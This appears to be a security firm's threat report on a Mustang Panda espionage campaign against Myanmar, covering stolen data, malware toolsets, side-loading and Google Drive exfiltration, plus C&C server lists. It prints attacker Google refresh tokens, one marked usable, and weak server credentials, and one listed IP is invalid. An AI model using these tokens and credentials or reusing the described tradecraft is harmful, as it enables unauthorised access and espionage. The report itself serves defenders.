Nearly all of the victims have close ties to Myanmar and it seems that both the Burmese government and opposition groups are being targeted. We have seen data originating from various departments of several Burmese ministries. Even the Office of the State Administrative Council has been targeted. The government breach is not isolated to Myanmar – we have also seen Myanmar embassies among targets, for example, the embassy in Serbia. The data also contained dumps of a mailbox used to communicate in 2016 and 2017, as well as in 2020 with visa applicants from all around the world. These messages contained scans of passports from citizens and diplomats from various countries, such as China, Australia, Czech Republic, France, Israel, Netherlands, UK, and USA.

After such an extensive list of targets, it ought to be little surprise that Myanmar Police Force is also among the targets. Even some higher profile departments, such as the Office of the Information Police Chief or the Department of Special Investigation, seem to have been breached. Tatmadaw (Myanmar Armed Forces) is also not an exception – we have seen victims from the Bureau of Air Defense, Myanmar Army Engineering, and the United Wa State Army.

Political NGOs and the government’s opposition are also on the list of victims. It is possible that the list is even more extensive as we may not be able to find a straightforward association to said organizations as we would expect more common usage of personal computers or computers that are not centrally maintained by an IT department. We have seen data from devices belonging to the Karen National Union, Center for Diversity and National Harmony, National Reconciliation and Peace Centre, Ethnic Nationalities Affairs Center, and even the Union Civil Service Board.

Exfiltrated Data 

The most common file types being exfiltrated by the group are Microsoft Office documents (.docx, .xlsx, .pptx, etc.), PDF documents, and plain text files. Other file types exfiltrated include audiovisual data in various forms, including sound recordings (.mp3), and pictures (.jpg, .png, etc.) or drawings. Emails, including entire conversations are also exfiltrated.

It appears that the attackers are also looking for and collecting data from browser profiles from various web browsers, e.g. Chrome, Firefox, Opera, and more, a serious threat to victims’ privacy. The stolen browser profiles can provide access to other infrastructures, services, and the victims’ private data. The attackers are extracting information about browsing history, stored credentials (personal and work), credit cards, used tokens, and valid cookie sessions. Consequently, poorly secured services, such as services without two-factor authentication or without a safe cookie policy, can be easily abused by attackers. Attackers can steal the identity of victims and can use their email, Facebook, Telegram, or other accounts to collect additional information about the victim and their family, friends, and activities.

Highly sensitive data is being collected from victims’ computers, and, in most cases, these are computers used by the Myanmar government, state administration, police, army, significant public organizations, or companies. This in some cases included sensitive data and information belonging to international citizens and diplomats who have interacted with targeted departments.

The volume of documents and audiovisual data being exfiltrated by the group is massive. The files include:

  • Email dumps including visa applications and scans of passports belonging to citizens and diplomats from various countries, such as China, Australia, Czech Republic, France, Israel, Netherlands, UK, and USA
  • A seating plan for the meeting between former US Ambassador to the United Nations Bill Richardson and Myanmar’s leader, Senior Gen. Min Aung Hlaing 
  • Myanmar’s constitution with proposed changes
  • Invitations for diplomatic meetings, meeting programs, calls, and talking points
  • Reports, maps, and screenshots from the Signal messaging app related to the UWSA (United Wa State Army)
  • Data from the Office of the Chief of Myanmar Air Defense Force, including meeting minutes, full staff/rank lists, photo IDs (some with fingerprints), salaries, personal details of employees’ families
  • Peace treaty documents
  • Interrogation reports
  • Contracts
  • Court hearings
  • Town plans
  • Contact information for police officers, including their names, addresses, telephone numbers, and salaries
  • Transcripts of meetings around politics, and elections
  • Meeting minutes and audio recordings of meetings between Myanmar senior officials (Prime minister, Chairman of State Administrative Council) and the President of Tatarstan
  • Military buildings drawings, including munitions storage, oil storage and aerial photos of proposed sites 
  • International banking records and transfers from supporters to a refugee group

Ties to known campaigns

Since getting our hands on the distribution point, we have established links between known campaigns already publicly reported and what we have discovered. This gives us clues as to how resourceful the group may be and will also help us assess its modus operandi.

We have found files strongly resembling (or even matching) samples and their relations described in a blogpost by ESET around the Korplug variant dubbed Hodur. The campaign they described was targeting various government organizations in Mongolia, Vietnam, and Myanmar, along with politically-oriented NGOs. This is in alignment with the victimology of the stolen data we have seen on the distribution point. Hodur was attributed to the Mustang Panda group. The related part of the uncovered toolset we analyzed also contained a USB launcher written in Delphi, similar to the one seen accompanying the Hodur variant of Korplug analyzed by ESET. This installer is responsible for firing up the infection chain leading to a variant of Korplug RAT.

Similarly, we’ve found similarities to operations attributed to LuminousMoth both in structure and purpose. For instance, we have seen a very similar structure as the one described in Bitdefender’s research on the LuminousMoth group. Namely, the usage of the same binaries for sideloading, same pattern for exfiltration – using RAR for collection and a sideloaded library for exfiltration via Google Drive. Perhaps the most common pattern was the usage of a USB launcher written in Delphi that was attributed to Mustang Panda, which was also described in Bitdefender’s research.

In some cases, we have seen some unreliable links to older campaigns such as Operation NightScout, a rather old KMPlayer supply-chain attack, or Operation Harvest. Namely, binaries used for sideloading or names of encrypted payloads matched the ones used in these old campaigns. Nevertheless, the specific payloads differ significantly, so while some of these were attributed to Mustang Panda, the similarity could also be coincidental.

Toolset overview

The storage we have discovered contains many archives with various tools to be downloaded by infected victims. We will use names of these archives to impose basic structure on the data we have found. It is worth noting that these names are partially consistent in successive versions. For instance, we have found an archive KKL which was later on accompanied by another version with a slightly different configuration called KKL1.

Some archives contained complete toolsets, whereas others only had single purpose tools in them that were meant to be used in connection with other tools; for instance, one contained a keylogger that obviously lacked any exfiltration functionality. This provides a strong indication that the tools are intended to be used modularly. We will build upon that and first talk about the usual Mustang Panda theme – Korplug. Then we’ll get to the more specific tools and end with the single purpose tools. Notably, nearly all the tools, aside from Korplug, its loaders, and Delphi installers, haven’t been described before. The RAT written in Go (JSX) and the modular backdoor (U5_2) deserve an extra mention due to their complexity.

From the data we have seen, we conjecture that the main exfiltration tools are variants of tools contained in archives named GDU, which use Google Drive for the exfiltration. Since we haven’t seen any exfiltration tool that uses the distribution point directly and the path on the server of exfiltrated files contains gd, we presume that the responsible group uses some other tools to move files from various Google Drives to the distribution point we saw.

A brief look at the toolsets brings up another interesting fact: almost all the files show a seven or eight hour offset (in a few cases exact to within seconds) between the compilation timestamp and the “last modified” timestamp of the file itself. Since the compilation timestamp is usually in UTC and the archives use the local time for the contents’ last modification date, this places us at UTC-8 and UTC-7. Therefore, we presume that the build setup operated in a time zone resembling Pacific Standard Time (PST) and Pacific Daylight Time (PDT), used on the West Coast of the United States. There is a caveat – SE3 and SE4 contain files that were compiled on November 1, 2021 and still have an eight hour offset, even though none of the countries using PST/PDT had transitioned to PST that early (both the USA and Canada transitioned to PST a few days later).

There is also a file with an obviously spoofed compilation timestamp. HT3 contains a DLL Vender.dll whose compilation timestamp dates more than a month after the last modification date. This further weakens hypotheses that build upon timestamp offsets. Unfortunately, we have no further leads explaining this outlier. The latest version of the uploader (multiUpload.exe), whose usage was spotted at the beginning of June, has a compilation timestamp of January 3, 2020. This is also very likely spoofed as analyses of the previous versions of this tool show clear evolution and, according to their respective timestamps, they were all compiled in April 2021. Not to mention that the corresponding infrastructure was only created at the end of May 2022.
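As an added illustration (not Avast's tooling), the following Python script applies the two timestamp checks from the paragraphs above to a constructed PE header: it reads the COFF TimeDateStamp, computes the offset to a naive archive mtime, flags a stamp that postdates the mtime by more than any time zone allows, and tests a -7/-8 h offset against the US Pacific DST rule for the compile date. The PE bytes, the dates and the 14-hour threshold are constructed assumptions.

```python
import struct
from datetime import date, datetime, time, timedelta, timezone

UTC = timezone.utc


def pe_compile_timestamp(data: bytes) -> datetime:
    """Return the COFF TimeDateStamp of a PE image as an aware UTC datetime.

    Linkers write this field as seconds since the Unix epoch in UTC, which is
    why it can be compared against an archive's local-time mtime at all.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF file header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    stamp = struct.unpack_from("<I", data, e_lfanew + 8)[0]
    return datetime.fromtimestamp(stamp, tz=UTC)


def offset_hours(compiled_utc: datetime, archive_mtime_local: datetime) -> float:
    """Archive mtime minus compile time, in hours, rounded to the nearest half hour.

    RAR/ZIP entries carry a naive local timestamp, so it is subtracted as if it
    were UTC; what remains is (local UTC offset + build-to-pack delay). Rounding
    absorbs the few seconds between linking the file and archiving it.
    """
    delta = archive_mtime_local.replace(tzinfo=UTC) - compiled_utc
    return round(delta.total_seconds() / 3600 * 2) / 2


def _nth_sunday(year: int, month: int, n: int) -> date:
    first = date(year, month, 1)
    first_sunday = first + timedelta(days=(6 - first.weekday()) % 7)
    return first_sunday + timedelta(weeks=n - 1)


def pacific_offset_hours(when_utc: datetime) -> float:
    """UTC offset of US/Canada Pacific time at a given instant.

    Post-2007 rule: PDT (UTC-7) from the second Sunday of March 02:00 PST
    (10:00 UTC) until the first Sunday of November 02:00 PDT (09:00 UTC),
    PST (UTC-8) otherwise.
    """
    year = when_utc.year
    dst_start = datetime.combine(_nth_sunday(year, 3, 2), time(10), tzinfo=UTC)
    dst_end = datetime.combine(_nth_sunday(year, 11, 1), time(9), tzinfo=UTC)
    return -7.0 if dst_start <= when_utc < dst_end else -8.0


def assess(pe_bytes: bytes, archive_mtime_local_iso: str) -> dict:
    """Apply the article's two sanity checks to one (binary, archive mtime) pair."""
    compiled = pe_compile_timestamp(pe_bytes)
    mtime = datetime.fromisoformat(archive_mtime_local_iso)  # naive local time from the archive
    off = offset_hours(compiled, mtime)
    return {
        "compiled_utc": compiled.isoformat(),
        "offset_hours": off,
        # No real time zone is more than 14 h from UTC, so a file "modified" much
        # earlier than it was linked has a spoofed TimeDateStamp (the Vender.dll case).
        "spoof_suspected": off < -14,
        # A -7/-8 h offset only supports the Pacific-time hypothesis if it matches
        # the DST state on the compile date (the November 1, 2021 caveat).
        "pacific_consistent": off == pacific_offset_hours(compiled),
    }


def build_sample_pe(compiled_utc_iso: str) -> bytes:
    """Constructed stand-in for a real binary: MZ stub, e_lfanew, PE signature, COFF header."""
    stamp = int(datetime.fromisoformat(compiled_utc_iso).replace(tzinfo=UTC).timestamp())
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<IHHIIIHH", 0x00004550, 0x8664, 1, stamp, 0, 0, 0, 0)
    return bytes(dos) + coff


if __name__ == "__main__":
    # Constructed case mirroring the caveat: linked 2021-11-01 10:00 UTC and packed 13 s
    # later by a machine whose clock read 02:00:13, i.e. an 8 h offset while Pacific
    # time was still on PDT.
    print(assess(build_sample_pe("2021-11-01T10:00:00"), "2021-11-01T02:00:13"))
```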

The folder /pub/god, which contained the toolset archives, was removed on June 25, 2022. On the same day, a new folder /pub/god1 was created with two files to which we didn’t have read access. Two days later, the new folder was gone and /pub/god appeared again with a subset of the original tools.

Variations on Korplug

The first group of tools that we’ll introduce are various versions of Korplug. The binaries used for side-loading were already seen before. Even though the loaders were mostly new, they were rather uninteresting. A common theme was a Delphi binary that served as a launcher to be executed from an infected USB drive. As we’ve already mentioned, a similar installer was previously seen in campaigns attributed to Mustang Panda. It just executes the Korplug loader from a folder named “Kaspersky” that is on the very same USB drive. See the diagram below (based on a toolset from an archive named BMD) for more details. 

Note the usage of the folder name “Kaspersky” and usage of “Symantec” in the names of the executables; since the launcher relies on social engineering tricks, it depends on a common strategy using seemingly legitimate file names to dispel any doubts concerning the content.

Contents of an archive called BMD. Archive YK41 follows the same structure, with ShellselDb.dat being replaced with hp_ui.xslbcdsj and without the Delphi launcher.

There were also simpler infection chains, containing just a signed clean binary, a loader to be side-loaded, and an encrypted Korplug. These were contained in archives WD, 127C, and 1260M. The latter interestingly used the OleView.exe binary which then side-loaded the ACLUI.dll that decrypted and executed ACLUI.DLL.UI. The same signed binary, surprisingly together with the same name for the encrypted payload, was used in the KMPlayer supply-chain attack in 2013. The accompanying research was only published in Chinese, likely due to the attack being limited to a few devices.

Exfiltration toolset

The exfiltrated data on the server in /pub/gd folder showed perfect correlation to the data produced by GDU toolsets (GDU_OLD, GDU, GDU1, GDU2, GDU1_NEW, GDU3, GDUPIZ). These tools collect the files on the victim’s disk, pack them into an archive whose name is prefixed with the victim’s ID and upload that archive onto a Google Drive. We presume that the name GDU is an acronym for Google Drive Uploader. While the tools themselves were technically rather simple, the exfiltration process and their evolution piqued our interest.

The analysis of the exfiltration process brought up several interesting observations. A few days after May 24, 2022, the day we started systematically monitoring Google Drives used for the exfiltration, we started to see more frequent token changes and new features being implemented. These features mitigated possible downtime caused by the migration to a new token. Since Google Drive has extensive logging functionality and the tokens have to be present on the infected devices, it is only a reasonable expectation that access to these drives is monitored to some extent.

On the contrary, we have not seen such behavior with the distribution point. This could be attributed to the fact that the distribution point is never exposed by the toolsets, which brings us to the assessment that the group presumes the distribution point to be secret or not worth monitoring.

Timeline of GDU exfiltration toolsets

Version overview

The oldest version GDU uses RAR executable to collect the data and an encrypted rar.dat to store parameters for the RAR binary. Starting from GDU_OLD, they migrated to their own collector piz.exe (this functionality was later moved to a DLL to be side-loaded) and retained an encrypted rar.dat where they stored their configuration. These toolsets also rely on two optional configuration files that are backed up by hard-coded values: token.dat containing an encrypted token for Google Drive and time.ini that contains last execution date along with the victim’s ID. The setup and the choice of binaries for side-loading bears resemblance to the LuminousMoth campaigns and tooling.

An archive GDU that contains a version relying on RAR instead of piz.exe for data collection.

The exfiltration process is usually handled by a variant of MyUpload.dll that is supplemented by the aforementioned configuration files. Quite recently, a new version of GDU1 has appeared on the distribution point (which we’ll call GDU1_NEW), which came with its successor multiUpload.exe. multiUpload.exe eschews hard-coded tokens and makes the exfiltration process more resilient to disruptions.

Archive GDU_OLD that uses its own collector piz.exe to collect potentially interesting files before the exfiltration.

The version we are calling GDU_OLD is basically the same as GDU1 and GDUPIZ, the most significant difference being a different PE being used for side-loading. GDU1 and GDUPIZ rely on CefSub.exe and subsequently on CefBrowser.dll instead of AtlTracetool.exe. GDUPIZ also uses a slightly different approach to execute the file collection tool piz.exe – the version included in this folder is in fact a renamed clean binary spoololk.exe which in turn side-loads vntfxf32.dll. This malicious binary implements the file-collecting functionality formerly contained in piz.exe. GDU2 is basically the same as GDUPIZ.

On June 8, 2022, we saw a new GDU1 toolset on the distribution point. This time MyUpload.dll has been upgraded to provide redundancy in the exfiltration process. It no longer uses token.dat but rather uses a Github repository as its source for the token. If this fails, there are two backups – one using HTTP PUT to www.watercaltropinfo[.]com with Basic HTTP Authorization (123:123). The other sends the data via HTTPS POST to m.watercaltropinfo[.]com. The collector is the same as in GDUPIZ. GDU3 uses basically the same process but uses different PE for side-loading (FwcMgmt.exe).

Tokens

A special chapter is devoted to Google Account tokens that are used in these tools, partially because our research may have forced the group’s hand to refresh the tokens once they discovered that we knew of their Google Drives. The fact that after each token decommission, every client had to have the token updated and that GDU toolsets do not have any remote update functionality suggests that these toolsets have to be accompanied by other tools that provide this update functionality. We noticed a longer delay between the decommissioning of the token from May 29, 2022 and the distribution of a replacement token. Its distribution coincides with the time a new version of GDU1_NEW was released. It’s exactly this version that has introduced new functionality in the exfiltration tool, namely smoother token swapping and failsafes for cases when Google Drive exfiltration fails. Therefore, we presume that this delay was caused by the development of this new functionality.

| Source | Refresh Token | Metadata |
|---|---|---|
| GDU/GDU_OLD | 1//030YFi1XWWVY2CgYIARAAGAMSNwF-L9Ir_I6Aqhg4gn3UWyi3I5J_6q4VxHPYNkit3x9RtlpVkFCEOD4KU-E2u7NghS0hx5nPU8Y | First seen: 22.4.2021. Not accessible |
| Distribution point | 1//0clbh_CVKereiCgYIARAAGAwSNwF-L9IrtPxC9zt-onaeeq2gTUwZTVa8f8ILvDYM8dyVVjmmKmNr5Pnsi27iMjLll2dxbDRxUQs | First seen: 22.4.2021. Not accessible |
| GDU1/GDU2/GDUPIZ | 1//0cZLNy7GH0LknCgYIARAAGAwSNwF-L9IrV7aXKTZb-WQM1aqXkjX0ph25dTZngOYAUlAXHB1NvCorgw62XI_TXsWNrK98KBYfbpA | First seen: 17.3.2022. Our first access: 24.5.2022. Usable until: 26.5.2022 |
| Distribution point | 1//0e29aixufumhCCgYIARAAGA4SNwF-L9IrX2w0GnjBQe4g5hQWKJlXjIQF7XZBnQ9VKArYhJVwOayZq9Ad-G8YHbsptTN5DhfXI2E | First seen: 29.5.2022. Our first access: 29.5.2022. Usable until: 3.6.2022 |
| Github | 1//0ewRnXWCf2AunCgYIARAAGA4SNwF-L9IradANDPAvIqPOaIfReqT1fQ0GO5A9FnUhdpdI0Q0V1IRye5RbTi-hcGQbbHKgDc02xfM | First seen: 8.6.2022. Our first access: 8.6.2022. Still usable |

Temporal analysis of exfiltrated data

We can also have a look at the metadata of the exfiltrated archives. What is rather unsurprising are the upload times which closely coincide with Burmese business hours – a smaller peak in the morning and a huge peak in the afternoon. Note that Myanmar is in UTC+6:30 time zone and China, presumed land of origin of Mustang Panda, is in UTC+8.

What is more interesting are events produced by the group itself – transfers from Google Drive onto the distribution point and deletion of files from the distribution point. The huge peak is around 18:00 MM time which coincides with the end of the work day in Myanmar. The spread of starts of upload windows is negligible, leading us to the presumption that the transfer is automated. We have seen a few archives being placed in the wrong directories which could indicate that the tooling is still under development or there’s still some manual work involved… Usually, the files have accumulated during the day on Google Drive and were transferred to the distribution point in the evening MM time.
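An added example, not part of the original research: a constructed listing of distribution-point events is converted to Myanmar time (UTC+6:30), bucketed by local hour, and the start of each day's transfer window is measured, which is the kind of spread check behind the automation presumption above. The archive names, event kinds and timestamps are made up.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone
from statistics import pstdev

UTC = timezone.utc
MYANMAR = timezone(timedelta(hours=6, minutes=30))  # MMT, UTC+6:30

# Constructed sample of distribution-point activity (not real listing data):
# (archive name, event kind, UTC time at which the change was observed).
#   "upload"   = victim archive appeared on the Google Drive
#   "transfer" = archive appeared under /pub/gd on the distribution point
#   "delete"   = archive disappeared from the distribution point
SAMPLE_EVENTS = [
    ("ID0001_day1.rar", "upload",   "2022-06-01T02:45:00Z"),  # 09:15 MMT
    ("ID0002_day1.rar", "upload",   "2022-06-01T08:00:00Z"),  # 14:30 MMT
    ("ID0003_day1.rar", "upload",   "2022-06-01T08:40:00Z"),  # 15:10 MMT
    ("ID0001_day1.rar", "transfer", "2022-06-01T11:32:00Z"),  # 18:02 MMT
    ("ID0002_day1.rar", "transfer", "2022-06-01T11:32:20Z"),
    ("ID0003_day1.rar", "transfer", "2022-06-01T11:32:41Z"),
    ("ID0001_day1.rar", "delete",   "2022-06-02T01:10:00Z"),  # 07:40 MMT next day
    ("ID0004_day2.rar", "upload",   "2022-06-02T03:30:00Z"),  # 10:00 MMT
    ("ID0005_day2.rar", "upload",   "2022-06-02T08:15:00Z"),  # 14:45 MMT
    ("ID0004_day2.rar", "transfer", "2022-06-02T11:35:00Z"),  # 18:05 MMT
    ("ID0005_day2.rar", "transfer", "2022-06-02T11:35:18Z"),
    ("ID0006_day3.rar", "upload",   "2022-06-03T07:50:00Z"),  # 14:20 MMT
    ("ID0006_day3.rar", "transfer", "2022-06-03T11:33:00Z"),  # 18:03 MMT
]


def to_mmt(ts_utc: str) -> datetime:
    """Parse an ISO-8601 UTC timestamp and shift it to Myanmar local time."""
    parsed = datetime.strptime(ts_utc, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=UTC)
    return parsed.astimezone(MYANMAR)


def hourly_profile(events, kind: str) -> dict:
    """Events of one kind bucketed by Myanmar local hour (0-23)."""
    counts = Counter(to_mmt(ts).hour for _, ev, ts in events if ev == kind)
    return dict(sorted(counts.items()))


def peak_hour(events, kind: str) -> int:
    """Local hour with the most events of the given kind."""
    profile = hourly_profile(events, kind)
    return max(profile, key=profile.get)


def daily_window_starts(events, kind: str) -> dict:
    """For each local day, the minute-of-day at which the first event of the kind occurred."""
    starts = {}
    for _, ev, ts in events:
        if ev != kind:
            continue
        local = to_mmt(ts)
        day = local.date().isoformat()
        minute = local.hour * 60 + local.minute
        starts[day] = min(starts.get(day, minute), minute)
    return starts


def window_spread_minutes(events, kind: str = "transfer") -> float:
    """Population std-dev of the daily window start across days.

    A spread of a few minutes suggests a scheduled job; a spread of hours
    suggests an operator moving the files by hand.
    """
    starts = daily_window_starts(events, kind)
    return pstdev(starts.values()) if len(starts) > 1 else 0.0


def likely_automated(events, kind: str = "transfer", tolerance_minutes: float = 10.0) -> bool:
    """True when the daily window start drifts less than the tolerance (an assumed threshold)."""
    return window_spread_minutes(events, kind) <= tolerance_minutes


if __name__ == "__main__":
    print("upload profile (MMT hour -> count):", hourly_profile(SAMPLE_EVENTS, "upload"))
    print("transfer window starts:", daily_window_starts(SAMPLE_EVENTS, "transfer"))
    print("transfer spread (min):", round(window_spread_minutes(SAMPLE_EVENTS), 2))
    print("likely automated:", likely_automated(SAMPLE_EVENTS))
```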

As we already mentioned in the introduction of uncovered tools, we have found quite a lot of files that were “missing” something. By that we mean that on their own, they were either lacking communication functionality or implemented some techniques that were useless without being accompanied by another payload. Interestingly, while these were also using side-loading, they were not relying on external encrypted files, making their execution flow straightforward with 2-point graphs. For the sake of brevity, we will list these in a table:

| Archive | Clean executable | Side-loaded DLL | Purpose (high-level) |
|---|---|---|---|
| MG/MG44 | dabs.ex/44.ex | SensorAware.dll | fingerprinting/remote shell |
| AUD | mcsync.ex | mcaltlib.dll | audio recording |
| CHR | browser.ex | browser_elf.dll | Cookie dumping |
| T3YK | ygfdt.exe | corecrl.dll | remote shell |
| UC | melt_64.exe | libmlt-6.dll | UAC bypass |
| KKL/KKL1 | mscorsvw.exe | mscorsvc.dll (contains KBE.dll) | clipboard stealer, keylogger |

Archive KKL contained a straightforward stealer in KBE.dll that was also hard-coded (in an encrypted form) in mscorsvc.dll from which it was unpacked after side-loading. The newer KKL1 was practically the same.

There are also a few standalone files such as x.ex in archive X which composes logs of registry entries (Run), services, and scheduled tasks along with checking all signatures of executable files in %WINDIR%. Archive NB contains nb.dat which is just the nbstat utility executable. There was also a coinminer in the archive INFO along with its encrypted configuration file.

An interesting utility is DISK2 (and its variant DISKM); it is responsible for monitoring the system drive for any changes. Both are accompanied by a configuration file that defines which files are of interest and where such files should be copied to. It also notifies its C&C server about these files via an encrypted message over HTTP. There is also a version of this tool named MF20211228 that does not contain any configuration file and does not copy files anywhere, it just sends messages to the C&C server.

Contents of an archive DISK2. This toolset is responsible for monitoring the system drive for any changes in files defined by its configuration.

Oddballs in the collection

JSX

JSX archives (JSX86 and newer JSX861 for 32 bit version and JSX64 and newer JSX641 for 64 bit version) deserve a separate mention as they use a rather uncommon setup; a JavaScript file is at the beginning of the chain and instead of side-loading, the respective DLL is launched as a service. mozload.dll is a RAT written in Go that uses HTTPS and websockets for its communication. Interestingly, the RAT uses TLS Client Authentication; see Appendix A.1 and Appendix A.2 for the private key and the certificate.

The execution flow of the packages from JSX archives.

HT3

HT3 simply does not fall into any of the previous categories – it is a backdoor with external configuration accompanied with a shellcode loader and UAC bypass.

Execution flow of HT3. Note that it contains both 32 bit and 64 bit versions of an UAC bypass tool.

SE

Now we are finally getting to a more complex setup. These archives include several versions with very similar structures and sometimes with varying payloads. Functional changes are presented below; note that these do not include changes in side-loading, which will be discussed later on. All versions feature a few evasion techniques that rely on registry modifications to hide files and file extensions.

| Version | Version changes |
|---|---|
| SE1 | Uses volume name for USB installer executable |
| SE3/SE4/SSE | Uses Delphi launcher (the one attributed to Mustang Panda), persistence integrated into LPVDPOCX.OCX (equivalent of facesdk.dll from SE1) |
| SE5 | Uses volume name for USB installer executable, rolls back to old USB installer |
| SE6 | No significant functional changes |
| SE7 | No significant functional changes |

SE3 and therefore also SE4 and SSE (which are mostly the same) use vivaldi.exe and vivaldi_elf.dll for their evasion module. Also, FacialFeatureDemo.exe and facesdk.dll are replaced by Symantecs.exe and LDVPOCX.OCX; the latter integrates persistence into itself instead of having it in a separate module. Interestingly, the USB installer has been replaced with one similar to the one in the archive BMK; a Delphi launcher that executes Symantec.cmd, which is actually Symantecs.exe. These versions are also the only ones that have renamed 3 of 4 payload bundles (using csdkset.dat for backdoor, EdrEpmpCStorages.dat for USB installer, and PchEpmpCStorages.dat with WTSAPI32.dll). Confusingly, WTSAPI32.dll does not seem to be used anywhere and will be used for side-loading by later versions, once the USB installer replacement is rolled back.

SE6 and SE7 abuse old Avast’s proxy executable wsc_proxy.exe to side-load wsc.dll which serves as the dispatcher. Aside from this change, there are no other significant changes to the functionality.

The schema of contents and the control flow of SE1. In newer versions, the persistence module is integrated in the dispatcher.

U5_2

The last complex toolset that we will present is from the archive U5_2. Most of the functional code is encrypted and bundled in AtiVir.csc. With the exception of a chain to a removable drive watcher, all the parts share similar XOR keys: user_panda_%section_name%; a rather interesting choice if the toolset really belongs to Mustang Panda.

An interesting part of the toolset is a file install_.exe that reads a file from a given path, takes the serial number of the volume where the file is located, computes an MD5 hash of the serial number and changes the first bytes of the file to the hex-encoded computed hash value.

The schema of contents and the control flow of U5_2.

Server infrastructure

The distribution point is an FTP server located in Malaysia that is accessible without a password (username anonymous, password is empty). We have also encountered a different FTP server in late 2020 containing very similar archives to the ones we now know contain exfiltrated data. Unfortunately, we did not have enough information to process the archives it contained. We presume that these two FTP servers were closely related or even that the current FTP server may be a successor of the one we found previously.

We noticed that the FTP server stopped responding in October. Fortunately, the server itself was still alive and the distribution migrated to using HTTP instead of FTP. They also started using HTTP Authorization; nevertheless, they have reused a weak username:password combination (123:123). This caused a downtime of a few days in our tracking, but with a quick fix, we’ve managed to get back on track. Presumably, this might have been another attempt to foil our tracking.

Our telemetry data also revealed another server in Russia. A client from Myanmar tried to download an archive XYZ from it via HTTP. Upon further inspection, the archive was found to be identical to XYZ from the aforementioned FTP server. We have tried to crawl the server for archives and files we have already seen on the FTP server and found the following toolsets:

| Archive on the HTTP server | Matching archive on the FTP | Note |
|---|---|---|
| gdupiz.rar | GDU | Retrieved from our telemetry |
| xcrs.exe | X | Discovered by crawling |
| jsx861.rar | JSX861 | Discovered by crawling |

The fact that the affected client is from Myanmar, and the fact that the server contains some parts of the described toolset strongly indicates that it is part of the same campaign. Nevertheless, since at least one archive was renamed, we were unable to fully enumerate its contents. Similarly, we were not able to verify whether the server contains exfiltrated data.

C&C infrastructure

JSX RAT

The JSX RAT attempts to communicate with 103.169.90[.]132 using TLS client authentication. The certificate (see Appendix A.2) is hard-coded and we can try to use it to confirm related infrastructure. Looking at the server certificate data, we see that it imitates a real hosting company.

Common name:        blue.net
City, country:      San Francisco, CA, US
Fingerprint (sha1): e0adf667e287b0051988dda2b85e7541d7532703
Self-signed

Interestingly, the C&C’s certificate had the exact same subject as the client certificate. Searching for other servers that use the same certificate yielded a couple more servers. Furthermore, we were able to confirm that the majority of these servers are running the same C&C software because they accept the RAT’s hard-coded client certificate.

A server at 118.31.166[.]5 seems to be an outlier among these servers with port 4433 being exposed. Since it is the oldest one using the same certificate and the server exhibits the same communication traits on that port, we suspect that it might be a development server.

Two of these servers were open to RDP connections with a certificate that had o9c[.]pg as its CN (Common name). We tried to go further using these certificates to uncover further candidates for C&Cs. The timeline of uncovered servers is below:

Timeline of servers using the discovered certificates. Blue ones use a certificate with blue[.]net CN, red ones use o9c[.]pg as CN, purple ones have both. The highlighted line corresponds to JSX RAT C&C.

These are servers using the same certificate:

| IP | Geo | Notes |
|---|---|---|
| 103.169.90[.]132 | MY | Original C&C. Ports: 443, 22, 53, 3389 |
| 45.79.409[.]10 | US | Suspected RAT C&C on port 443 |
| 118.31.166[.]5 | CN | Suspected RAT C&C on port 443, different response codes |
| 181.215.246[.]173 | MY | |
| 39.104.52[.]188 | CN | Suspected RAT C&C on port 443 |
| 45.56.90[.]127 | US | Suspected RAT C&C on port 443 |
| 154.204.176[.]249 | HK | |
| 47.244.2[.]17 | HK | Suspected RAT C&C on port 443, RDP |
| 47.96.236[.]105 | CN | |
| 134.122.129[.]170 | HK | Suspected RAT C&C on port 443 |
| 172.105.158[.]102 | US | Suspected RAT C&C on port 443, RDP |
| 192.46.213[.]63 | IN | Suspected RAT C&C on port 443 |

Overview of the servers with ties to the JSX RAT C&C.

These are RDP servers sharing the same certificate as the two C&Cs with open RDP port:

| IP | Geo | Notes |
|---|---|---|
| 47.75.123[.]100 | HK | |
| 47.242.171[.]26 | HK | |
| 47.57.87[.]221 | HK | |
| 172.105.118[.]92 | SG | |
| 172.105.159[.]130 | US | |
| 47.244.2[.]17 | HK | Is also on the previous list. |
| 47.242.95[.]126 | HK | |
| 8.210.16[.]197 | HK | |
| 172.104.92[.]7 | JP | |
| 45.33.34[.]11 | US | |
| 45.79.102[.]41 | US | |
| 47.57.108[.]231 | HK | |
| 194.195.240[.]87 | DE | |
| 47.56.65[.]198 | HK | |
| 8.210.128[.]37 | HK | |
| 172.105.158[.]102 | US | Is also on the previous list. |
| 47.57.110[.]128 | HK | |
| 47.242.6[.]26 | HK | |
| 23.92.26[.]127 | US | |
| 47.75.183[.]119 | HK | |

Other C&C servers:

| Folder | Geo | C&C | Notes |
|---|---|---|---|
| DISK2/DISKM/MF20211228 | RU | 188.127.249[.]169 | Stealer |
| HT3 | MY | 45.121.147[.]172 | Korplug |
| JSX | MY | 103.169.90[.]132 | RAT |
| MG/MG44 | SG | 23.106.122[.]81 | Remote shell |
| SE4/SE5/SE6/SE7 | SG | 91.245.253[.]72 | Backdoor (ZIPDLL.dll) |
| SEE | MY | 103.91.66[.]116 | Backdoor (ZIPDLL.dll) |
| T3YK | MY | 111.90.148[.]95 | Remote shell |
| U5_2 | MY | 103.117.141[.]202 | RAT |
| YK51LOW | MY, N/A | mod.mmgpms[.]com, txt.mm-film[.]com | Backdoor |
| 1260M | US | 45.134.83[.]4 | Korplug |
| GDU1_NEW/GDU3 | | https://github.com/YanNaingOo0072022/View2015 | Encrypted Google Drive token |

Conclusion

It is not very often that we stumble upon such a stash of samples used to distribute malware to infected devices, especially when we are talking about tools that are strongly correlated with a notorious APT group. We have shown links, in both tools and TTPs, to multiple previously published pieces of research on related campaigns, giving us high confidence that the threat actor in question is Mustang Panda.

The exfiltrated data indicates that the toolsets we found were actively used around Myanmar. For instance, we found audio recordings that correspond to the audio recording tools we identified in the archive named AUD. Although many tools were simplistic in nature, and sometimes also in their chosen obfuscation methods, some archives contained tools that seem to deserve further analysis, be it due to their complexity or their technical implementation.

